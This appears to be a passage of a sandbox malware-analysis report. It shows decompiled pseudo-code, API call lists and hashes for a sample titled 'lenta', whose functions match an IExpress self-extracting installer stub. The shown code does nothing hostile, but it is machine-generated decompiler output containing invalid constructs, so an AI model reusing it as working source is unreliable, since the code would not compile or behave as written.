                              				_v8 = _t29 ^ _t74;
                              				_t68 = __edx;
                              				_v44 = __ecx;
                              				GetWindowRect(__ecx,  &_v40);
                              				_t53 = _v40.bottom - _v40.top;
                              				_v48 = _v40.right - _v40.left;
                              				GetWindowRect(_t68,  &_v24);
                              				_v56 = _v24.bottom - _v24.top;
                              				_t69 = GetDC(_v44);
                              				_v52 = GetDeviceCaps(_t69, 8);
                              				_v60 = GetDeviceCaps(_t69, 0xa);
                              				ReleaseDC(_v44, _t69);
                              				_t56 = _v48;
                              				asm("cdq");
                              				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                              				_t67 = 0;
                              				if(_t72 >= 0) {
                              					_t63 = _v52;
                              					if(_t72 + _t56 > _t63) {
                              						_t72 = _t63 - _t56;
                              					}
                              				} else {
                              					_t72 = _t67;
                              				}
                              				asm("cdq");
                              				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                              				if(_t59 >= 0) {
                              					_t63 = _v60;
                              					if(_t59 + _t53 > _t63) {
                              						_t59 = _t63 - _t53;
                              					}
                              				} else {
                              					_t59 = _t67;
                              				}
                              				return E010E6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                              			}

                              APIs
                              • GetWindowRect.USER32(?,?), ref: 010E43F1
                              • GetWindowRect.USER32(00000000,?), ref: 010E440B
                              • GetDC.USER32(?), ref: 010E4423
                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 010E442E
                              • GetDeviceCaps.GDI32(00000000,0000000A), ref: 010E443A
                              • ReleaseDC.USER32(?,00000000), ref: 010E4447
                              • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 010E44A2
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Window$CapsDeviceRect$Release
                              • String ID:
                              • API String ID: 2212493051-0
                              • Opcode ID: 4ace18785a46217f4d1d0201574a26dc217fd01f46e1c51f2f93f65f078baaf6
                              • Instruction ID: ecde2537c1f88f6fa82452bbc0cac5a42fa33f7532612b1cf4cf0980da97df34
                              • Opcode Fuzzy Hash: 4ace18785a46217f4d1d0201574a26dc217fd01f46e1c51f2f93f65f078baaf6
                              • Instruction Fuzzy Hash: 18313872F00119AFCB24CEB9D9889EEBBF5EB89310F154169F845F7244DA35AD058B60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 53%
                              			E010E6298(intOrPtr __ecx, intOrPtr* __edx) {
                              				signed int _v8;
                              				char _v28;
                              				intOrPtr _v32;
                              				struct HINSTANCE__* _v36;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t16;
                              				struct HRSRC__* _t21;
                              				intOrPtr _t26;
                              				void* _t30;
                              				struct HINSTANCE__* _t36;
                              				intOrPtr* _t40;
                              				void* _t41;
                              				intOrPtr* _t44;
                              				intOrPtr* _t45;
                              				void* _t47;
                              				signed int _t50;
                              				struct HINSTANCE__* _t51;
                              
                              				_t44 = __edx;
                              				_t16 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t16 ^ _t50;
                              				_t46 = 0;
                              				_v32 = __ecx;
                              				_v36 = 0;
                              				_t36 = 1;
                              				E010E171E( &_v28, 0x14, "UPDFILE%lu", 0);
                              				while(1) {
                              					_t51 = _t51 + 0x10;
                              					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                              					if(_t21 == 0) {
                              						break;
                              					}
                              					_t45 = LockResource(LoadResource(_t46, _t21));
                              					if(_t45 == 0) {
                              						 *0x10e9124 = 0x80070714;
                              						_t36 = _t46;
                              					} else {
                              						_t5 = _t45 + 8; // 0x8
                              						_t44 = _t5;
                              						_t40 = _t44;
                              						_t6 = _t40 + 1; // 0x9
                              						_t47 = _t6;
                              						do {
                              							_t26 =  *_t40;
                              							_t40 = _t40 + 1;
                              						} while (_t26 != 0);
                              						_t41 = _t40 - _t47;
                              						_t46 = _t51;
                              						_t7 = _t41 + 1; // 0xa
                              						 *0x10ea288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                              						_t30 = _v32();
                              						if(_t51 != _t51) {
                              							asm("int 0x29");
                              						}
                              						_push(_t45);
                              						if(_t30 == 0) {
                              							_t36 = 0;
                              							FreeResource(??);
                              						} else {
                              							FreeResource();
                              							_v36 = _v36 + 1;
                              							E010E171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                              							_t46 = 0;
                              							continue;
                              						}
                              					}
                              					L12:
                              					return E010E6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                              				}
                              				goto L12;
                              			}

                              APIs
                                • Part of subcall function 010E171E: _vsnprintf.MSVCRT ref: 010E1750
                              • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,010E51CA,00000004,00000024,010E2F71,?,00000002,00000000), ref: 010E62CD
                              • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,010E51CA,00000004,00000024,010E2F71,?,00000002,00000000), ref: 010E62D4
                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010E51CA,00000004,00000024,010E2F71,?,00000002,00000000), ref: 010E631B
                              • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 010E6345
                              • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010E51CA,00000004,00000024,010E2F71,?,00000002,00000000), ref: 010E6357
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$Free$FindLoadLock_vsnprintf
                              • String ID: UPDFILE%lu
                              • API String ID: 2922116661-2329316264
                              • Opcode ID: ba28c72fd0ede3290bb8f04715861c7cc36f0b27e735b2d00191c4377f3c5b1d
                              • Instruction ID: fa70b6d9081c06f71061de806adb5c9ced505f12710a3fc29d87007f8aec0191
                              • Opcode Fuzzy Hash: ba28c72fd0ede3290bb8f04715861c7cc36f0b27e735b2d00191c4377f3c5b1d
                              • Instruction Fuzzy Hash: 3C21D875B00219AFDB209F66EC499FE7BF8FB48B54F004159F982A7201D73B99018BE0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E010E681F(void* __ebx) {
                              				signed int _v8;
                              				char _v20;
                              				struct _OSVERSIONINFOA _v168;
                              				void* _v172;
                              				int* _v176;
                              				int _v180;
                              				int _v184;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t19;
                              				long _t31;
                              				signed int _t35;
                              				void* _t36;
                              				intOrPtr _t41;
                              				signed int _t44;
                              
                              				_t36 = __ebx;
                              				_t19 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t19 ^ _t44;
                              				_t41 =  *0x10e81d8; // 0xfffffffe
                              				_t43 = 0;
                              				_v180 = 0xc;
                              				_v176 = 0;
                              				if(_t41 == 0xfffffffe) {
                              					 *0x10e81d8 = 0;
                              					_v168.dwOSVersionInfoSize = 0x94;
                              					if(GetVersionExA( &_v168) == 0) {
                              						L12:
                              						_t41 =  *0x10e81d8; // 0xfffffffe
                              					} else {
                              						_t41 = 1;
                              						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                              							goto L12;
                              						} else {
                              							_t31 = RegQueryValueExA(_v172, 0x10e1140, 0,  &_v184,  &_v20,  &_v180);
                              							_t43 = _t31;
                              							RegCloseKey(_v172);
                              							if(_t31 != 0) {
                              								goto L12;
                              							} else {
                              								_t40 =  &_v176;
                              								if(E010E66F9( &_v20,  &_v176) == 0) {
                              									goto L12;
                              								} else {
                              									_t35 = _v176 & 0x000003ff;
                              									if(_t35 == 1 || _t35 == 0xd) {
                              										 *0x10e81d8 = _t41;
                              									} else {
                              										goto L12;
                              									}
                              								}
                              							}
                              						}
                              					}
                              				}
                              				return E010E6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                              			}

                              APIs
                              • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010E686E
                              • GetSystemMetrics.USER32(0000004A), ref: 010E68A7
                              • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010E68CC
                              • RegQueryValueExA.ADVAPI32(?,010E1140,00000000,?,?,0000000C), ref: 010E68F4
                              • RegCloseKey.ADVAPI32(?), ref: 010E6902
                                • Part of subcall function 010E66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,010E691A), ref: 010E6741
                              Strings
                              • Control Panel\Desktop\ResourceLocale, xrefs: 010E68C2
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                              • String ID: Control Panel\Desktop\ResourceLocale
                              • API String ID: 3346862599-1109908249
                              • Opcode ID: 1b0edee3015ad3f2800fd3f259a8683bab04114b5362fefe00ca5bcb80b58153
                              • Instruction ID: 1aafdf3dd6fe0cc0fc6f56041b3108577f3b046d595df7e97bad8652fd736277
                              • Opcode Fuzzy Hash: 1b0edee3015ad3f2800fd3f259a8683bab04114b5362fefe00ca5bcb80b58153
                              • Instruction Fuzzy Hash: 59318231A40218DFDB31CB17EC48BEA7BFCEB55764F0041D5E989AA240D73699858F51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E3A3F(void* __eflags) {
                              				void* _t3;
                              				void* _t9;
                              				CHAR* _t16;
                              
                              				_t16 = "LICENSE";
                              				_t1 = E010E468F(_t16, 0, 0) + 1; // 0x1
                              				_t3 = LocalAlloc(0x40, _t1);
                              				 *0x10e8d4c = _t3;
                              				if(_t3 != 0) {
                              					_t19 = _t16;
                              					if(E010E468F(_t16, _t3, _t28) != 0) {
                              						if(lstrcmpA( *0x10e8d4c, "<None>") == 0) {
                              							LocalFree( *0x10e8d4c);
                              							L9:
                              							 *0x10e9124 = 0;
                              							return 1;
                              						}
                              						_t9 = E010E6517(_t19, 0x7d1, 0, E010E3100, 0, 0);
                              						LocalFree( *0x10e8d4c);
                              						if(_t9 != 0) {
                              							goto L9;
                              						}
                              						 *0x10e9124 = 0x800704c7;
                              						L2:
                              						return 0;
                              					}
                              					E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                              					LocalFree( *0x10e8d4c);
                              					 *0x10e9124 = 0x80070714;
                              					goto L2;
                              				}
                              				E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
                              				 *0x10e9124 = E010E6285();
                              				goto L2;
                              			}

                              APIs
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                              • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010E2F64,?,00000002,00000000), ref: 010E3A5D
                              • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 010E3AB3
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                              • lstrcmpA.KERNEL32(<None>,00000000), ref: 010E3AD0
                              • LocalFree.KERNEL32 ref: 010E3B13
                                • Part of subcall function 010E6517: FindResourceA.KERNEL32(010E0000,000007D6,00000005), ref: 010E652A
                                • Part of subcall function 010E6517: LoadResource.KERNEL32(010E0000,00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010E6538
                                • Part of subcall function 010E6517: DialogBoxIndirectParamA.USER32(010E0000,00000000,00000547,010E19E0,00000000), ref: 010E6557
                                • Part of subcall function 010E6517: FreeResource.KERNEL32(00000000,?,?,010E2EE8,00000000,010E19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010E6560
                              • LocalFree.KERNEL32(00000000,010E3100,00000000,00000000), ref: 010E3AF4
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                              • String ID: <None>$LICENSE
                              • API String ID: 2414642746-383193767
                              • Opcode ID: 064f6ba610277a31f64ff2a8eb6c8bad93d9442d4bd7788eba85f9176e0a386e
                              • Instruction ID: 603b7f084cb65ea5b26799051bcc7c3adbbeaf6b6fe203bf7cbd40dd1d3d5ede
                              • Opcode Fuzzy Hash: 064f6ba610277a31f64ff2a8eb6c8bad93d9442d4bd7788eba85f9176e0a386e
                              • Instruction Fuzzy Hash: D9115171705201AED7346B27AC0CE5B7EE9EBD9B50B00446EB5C6DF254DA7F88008764
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E010E24E0(void* __ebx) {
                              				signed int _v8;
                              				char _v268;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t7;
                              				void* _t20;
                              				long _t26;
                              				signed int _t27;
                              
                              				_t20 = __ebx;
                              				_t7 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t7 ^ _t27;
                              				_t25 = 0x104;
                              				_t26 = 0;
                              				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                              					E010E658A( &_v268, 0x104, "wininit.ini");
                              					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                              					_t25 = _lopen( &_v268, 0x40);
                              					if(_t25 != 0xffffffff) {
                              						_t26 = _llseek(_t25, 0, 2);
                              						_lclose(_t25);
                              					}
                              				}
                              				return E010E6CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                              			}












                              APIs
                              • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 010E2506
                              • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 010E252C
                              • _lopen.KERNEL32 ref: 010E253B
                              • _llseek.KERNEL32(00000000,00000000,00000002), ref: 010E254C
                              • _lclose.KERNEL32(00000000), ref: 010E2555
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                              • String ID: wininit.ini
                              • API String ID: 3273605193-4206010578
                              • Opcode ID: 1412917e08582a7f474ee3dc00b2f26b05d90ea2c8170a07d6142079c4394b98
                              • Instruction ID: 9034fc79c89149b6826f9f3278114a0c495d1395d270f6e36d586aadbc2af316
                              • Opcode Fuzzy Hash: 1412917e08582a7f474ee3dc00b2f26b05d90ea2c8170a07d6142079c4394b98
                              • Instruction Fuzzy Hash: BF019632700118ABD7309A669D0CEDF7FFCDB95B60F000155FA85D7144DA794A418B90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 75%
                              			E010E36EE(CHAR* __ecx) {
                              				signed int _v8;
                              				char _v268;
                              				struct _OSVERSIONINFOA _v416;
                              				signed int _v420;
                              				signed int _v424;
                              				CHAR* _v428;
                              				CHAR* _v432;
                              				signed int _v436;
                              				CHAR* _v440;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t72;
                              				CHAR* _t77;
                              				CHAR* _t91;
                              				CHAR* _t94;
                              				int _t97;
                              				CHAR* _t98;
                              				signed char _t99;
                              				CHAR* _t104;
                              				signed short _t107;
                              				signed int _t109;
                              				short _t113;
                              				void* _t114;
                              				signed char _t115;
                              				short _t119;
                              				CHAR* _t123;
                              				CHAR* _t124;
                              				CHAR* _t129;
                              				signed int _t131;
                              				signed int _t132;
                              				CHAR* _t135;
                              				CHAR* _t138;
                              				signed int _t139;
                              
                              				_t72 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t72 ^ _t139;
                              				_v416.dwOSVersionInfoSize = 0x94;
                              				_t115 = __ecx;
                              				_t135 = 0;
                              				_v432 = __ecx;
                              				_t138 = 0;
                              				if(GetVersionExA( &_v416) != 0) {
                              					_t133 = _v416.dwMajorVersion;
                              					_t119 = 2;
                              					_t77 = _v416.dwPlatformId - 1;
                              					__eflags = _t77;
                              					if(_t77 == 0) {
                              						_t119 = 0;
                              						__eflags = 1;
                              						 *0x10e8184 = 1;
                              						 *0x10e8180 = 1;
                              						L13:
                              						 *0x10e9a40 = _t119;
                              						L14:
                              						__eflags =  *0x10e8a34 - _t138; // 0x0
                              						if(__eflags != 0) {
                              							goto L66;
                              						}
                              						__eflags = _t115;
                              						if(_t115 == 0) {
                              							goto L66;
                              						}
                              						_v428 = _t135;
                              						__eflags = _t119;
                              						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                              						_t11 =  &_v420;
                              						 *_t11 = _v420 & _t138;
                              						__eflags =  *_t11;
                              						_v440 = _t115;
                              						do {
                              							_v424 = _t135 * 0x18;
                              							_v436 = E010E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                              							_t91 = E010E2A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                              							_t123 = _v436;
                              							_t133 = 0x54d;
                              							__eflags = _t123;
                              							if(_t123 < 0) {
                              								L32:
                              								__eflags = _v420 - 1;
                              								if(_v420 == 1) {
                              									_t138 = 0x54c;
                              									L36:
                              									__eflags = _t138;
                              									if(_t138 != 0) {
                              										L40:
                              										__eflags = _t138 - _t133;
                              										if(_t138 == _t133) {
                              											L30:
                              											_v420 = _v420 & 0x00000000;
                              											_t115 = 0;
                              											_v436 = _v436 & 0x00000000;
                              											__eflags = _t138 - _t133;
                              											_t133 = _v432;
                              											if(__eflags != 0) {
                              												_t124 = _v440;
                              											} else {
                              												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                              												_v420 =  &_v268;
                              											}
                              											__eflags = _t124;
                              											if(_t124 == 0) {
                              												_t135 = _v436;
                              											} else {
                              												_t99 = _t124[0x30];
                              												_t135 = _t124[0x34] + 0x84 + _t133;
                              												__eflags = _t99 & 0x00000001;
                              												if((_t99 & 0x00000001) == 0) {
                              													asm("sbb ebx, ebx");
                              													_t115 =  ~(_t99 & 2) & 0x00000101;
                              												} else {
                              													_t115 = 0x104;
                              												}
                              											}
                              											__eflags =  *0x10e8a38 & 0x00000001;
                              											if(( *0x10e8a38 & 0x00000001) != 0) {
                              												L64:
                              												_push(0);
                              												_push(0x30);
                              												_push(_v420);
                              												_push("lenta");
                              												goto L65;
                              											} else {
                              												__eflags = _t135;
                              												if(_t135 == 0) {
                              													goto L64;
                              												}
                              												__eflags =  *_t135;
                              												if( *_t135 == 0) {
                              													goto L64;
                              												}
                              												MessageBeep(0);
                              												_t94 = E010E681F(_t115);
                              												__eflags = _t94;
                              												if(_t94 == 0) {
                              													L57:
                              													0x180030 = 0x30;
                              													L58:
                              													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                              													__eflags = _t115 & 0x00000004;
                              													if((_t115 & 0x00000004) == 0) {
                              														__eflags = _t115 & 0x00000001;
                              														if((_t115 & 0x00000001) == 0) {
                              															goto L66;
                              														}
                              														__eflags = _t97 - 1;
                              														L62:
                              														if(__eflags == 0) {
                              															_t138 = 0;
                              														}
                              														goto L66;
                              													}
                              													__eflags = _t97 - 6;
                              													goto L62;
                              												}
                              												_t98 = E010E67C9(_t124, _t124);
                              												__eflags = _t98;
                              												if(_t98 == 0) {
                              													goto L57;
                              												}
                              												goto L58;
                              											}
                              										}
                              										__eflags = _t138 - 0x54c;
                              										if(_t138 == 0x54c) {
                              											goto L30;
                              										}
                              										__eflags = _t138;
                              										if(_t138 == 0) {
                              											goto L66;
                              										}
                              										_t135 = 0;
                              										__eflags = 0;
                              										goto L44;
                              									}
                              									L37:
                              									_t129 = _v432;
                              									__eflags = _t129[0x7c];
                              									if(_t129[0x7c] == 0) {
                              										goto L66;
                              									}
                              									_t133 =  &_v268;
                              									_t104 = E010E28E8(_t129,  &_v268, _t129,  &_v428);
                              									__eflags = _t104;
                              									if(_t104 != 0) {
                              										goto L66;
                              									}
                              									_t135 = _v428;
                              									_t133 = 0x54d;
                              									_t138 = 0x54d;
                              									goto L40;
                              								}
                              								goto L33;
                              							}
                              							__eflags = _t91;
                              							if(_t91 > 0) {
                              								goto L32;
                              							}
                              							__eflags = _t123;
                              							if(_t123 != 0) {
                              								__eflags = _t91;
                              								if(_t91 != 0) {
                              									goto L37;
                              								}
                              								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                              								L27:
                              								if(__eflags <= 0) {
                              									goto L37;
                              								}
                              								L28:
                              								__eflags = _t135;
                              								if(_t135 == 0) {
                              									goto L33;
                              								}
                              								_t138 = 0x54c;
                              								goto L30;
                              							}
                              							__eflags = _t91;
                              							_t107 = _v416.dwBuildNumber;
                              							if(_t91 != 0) {
                              								_t131 = _v424;
                              								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                              								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                              									goto L37;
                              								}
                              								goto L28;
                              							}
                              							_t132 = _t107 & 0x0000ffff;
                              							_t109 = _v424;
                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                              							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                              								goto L28;
                              							}
                              							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                              							goto L27;
                              							L33:
                              							_t135 =  &(_t135[1]);
                              							_v428 = _t135;
                              							_v420 = _t135;
                              							__eflags = _t135 - 2;
                              						} while (_t135 < 2);
                              						goto L36;
                              					}
                              					__eflags = _t77 == 1;
                              					if(_t77 == 1) {
                              						 *0x10e9a40 = _t119;
                              						 *0x10e8184 = 1;
                              						 *0x10e8180 = 1;
                              						__eflags = _t133 - 3;
                              						if(_t133 > 3) {
                              							__eflags = _t133 - 5;
                              							if(_t133 < 5) {
                              								goto L14;
                              							}
                              							_t113 = 3;
                              							_t119 = _t113;
                              							goto L13;
                              						}
                              						_t119 = 1;
                              						_t114 = 3;
                              						 *0x10e9a40 = 1;
                              						__eflags = _t133 - _t114;
                              						if(__eflags < 0) {
                              							L9:
                              							 *0x10e8184 = _t135;
                              							 *0x10e8180 = _t135;
                              							goto L14;
                              						}
                              						if(__eflags != 0) {
                              							goto L14;
                              						}
                              						__eflags = _v416.dwMinorVersion - 0x33;
                              						if(_v416.dwMinorVersion >= 0x33) {
                              							goto L14;
                              						}
                              						goto L9;
                              					}
                              					_t138 = 0x4ca;
                              					goto L44;
                              				} else {
                              					_t138 = 0x4b4;
                              					L44:
                              					_push(_t135);
                              					_push(0x10);
                              					_push(_t135);
                              					_push(_t135);
                              					L65:
                              					_t133 = _t138;
                              					E010E44B9(0, _t138);
                              					L66:
                              					return E010E6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                              				}
                              			}






































                              APIs
                              • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 010E3723
                              • MessageBeep.USER32(00000000), ref: 010E39C3
                              • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 010E39F1
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Message$BeepVersion
                              • String ID: 3$lenta
                              • API String ID: 2519184315-4216304122
                              • Opcode ID: 00c24e1868ec33a14901fd5cb87269b519b39e5fc59e28b5cae30e5ec8f5b184
                              • Instruction ID: b86db8c7c02e33c84da4193f86b6d672de55112a3b0a02a6e34a99d572567247
                              • Opcode Fuzzy Hash: 00c24e1868ec33a14901fd5cb87269b519b39e5fc59e28b5cae30e5ec8f5b184
                              • Instruction Fuzzy Hash: 7291B271E012159FEBB98A1BC9887EABFF5BB85704F0941EAC9C99F241D7358D80CB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 83%
                              			E010E6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                              				signed int _v8;
                              				char _v268;
                              				void* __edi;
                              				signed int _t9;
                              				signed char _t14;
                              				struct HINSTANCE__* _t15;
                              				void* _t18;
                              				CHAR* _t26;
                              				void* _t27;
                              				signed int _t28;
                              
                              				_t27 = __esi;
                              				_t18 = __ebx;
                              				_t9 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t9 ^ _t28;
                              				_push(__ecx);
                              				E010E1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP000.TMP\");
                              				_t26 = "advpack.dll";
                              				E010E658A( &_v268, 0x104, _t26);
                              				_t14 = GetFileAttributesA( &_v268);
                              				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                              					_t15 = LoadLibraryA(_t26);
                              				} else {
                              					_t15 = LoadLibraryExA( &_v268, 0, 8);
                              				}
                              				return E010E6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                              			}














                              APIs
                              • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000000), ref: 010E64DF
